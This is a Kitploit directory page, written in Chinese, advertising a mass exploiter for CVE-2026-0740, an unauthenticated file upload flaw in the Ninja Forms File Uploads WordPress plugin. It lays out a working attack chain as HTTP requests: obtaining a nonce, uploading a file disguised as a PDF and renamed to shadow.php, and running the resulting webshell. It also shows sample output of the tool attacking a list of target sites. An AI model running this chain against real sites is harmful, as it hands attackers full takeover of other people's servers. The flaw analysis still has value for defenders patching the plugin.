Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-0740 — Automated mass exploiter for CVE-2026-0740,针对 Ninja Forms File Uploads 插件中未经验证的任意文件上传漏洞,可通过精心构造的上传实现远程代码执行。 | Kitploit
工具/GitHubGitHub/xshadow-here/cve-2026-0740
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubxshadow-here/cve-2026-0740

CVE-2026-0740

Automated mass exploiter for CVE-2026-0740,针对 Ninja Forms File Uploads 插件中未经验证的任意文件上传漏洞,可通过精心构造的上传实现远程代码执行。

查看仓库
34个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 未认证任意文件上传。

描述:

用于 WordPress 的 Ninja Forms - File Uploads 插件存在未认证任意文件上传漏洞,原因是在所有版本(包括 3.3.26)的 'NF_FU_AJAX_Controllers_Uploads::handle_upload' 函数中缺少文件类型验证和权限检查。

此漏洞允许未认证的攻击者:

  • 为任意 field_id 生成有效的 nonce。
  • 使用白名单绕过技术上传任意文件。
  • 强制服务器端将白名单扩展名(.pdf)重命名为 PHP 扩展名。
  • 上传的 webshell 将存储在: → /wp-content/uploads/ninja-forms/tmp/
  • 在受影响的服务器上实现远程代码执行(RCE)。

信息:CVE-2026-0740

~ CVSS 评分:9.8(严重)

~ 受影响版本:<= 3.3.26

  • 研究人员:Sélim Lanouar-(whattheslime)

攻击向量

root@kitploit:~
步骤 1:获取 Nonce
────────────────────────────────────
POST /wp-admin/admin-ajax.php
数据:action=nf_fu_get_new_nonce&field_id=7&form_id=7

响应:{"success":true,"data":{"nonce":"7a850757a1"}}

              │
              ▼

步骤 2:上传伪装文件并重命名为 PHP
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
数据:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected](白名单扩展名)
- doc_pdf=shadow.php(重命名目标)

              │
              ▼

步骤 3:服务器存储恶意文件
─────────────────────────────────────
位置:/wp-content/uploads/ninja-forms/tmp/shadow.php
内容:PHP shell(上传器 / webshell)

              │
              ▼

步骤 4:执行上传的文件
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ 执行 webshell
→ 完全接管服务器
root@kitploit:~
- 实地测试结论:

1. `nf_fu_get_new_nonce` 端点无需检查字段是否存在即可返回有效的 nonce
   → 不验证 `field_id` 和 `form_id` 参数(任何随机 ID 均可)

2. 重命名功能存在严重逻辑缺陷
   → 插件接受用户通过 POST 参数提供的文件名
   → 重命名后不验证最终文件扩展名

3. 上传的文件直接落入 Web 可访问目录
   → /wp-content/uploads/ninja-forms/tmp/

4. 此工具的作者非常英俊

功能:

  • 自动获取 nonce
  • 使用默认 ID 进行利用
  • 错误处理
  • 自动将结果保存到 shell.txt

使用方法:

  • 确保文件名为 list.txt 且位于当前目录中
  • python/python3 shadow.py

输出:

root@kitploit:~
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
 ╰┈➤ 完整响应显示

[+] 已加载 100 个目标

[1/100]
😈 [FRISKA RESEARCHER] 攻击:https://example.com
[*] 获取 nonce...
[*] HTTP 状态码:400
[*] 响应:0
[-] HTTP 错误:400

[2/100]
😈 [FRISKA RESEARCHER] 攻击:https://www.test.com
[*] 获取 nonce...
[*] HTTP 状态码:200
[*] 响应:{"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce:b0404ec210
[*] 上传 shell...
[*] 上传响应:{"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}

============================================================
🔥 SHELL 上传器:https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================

此工具仅用于教育和安全测试目的。

未经授权使用你不拥有或没有权限测试的系统是违法的。

下载工具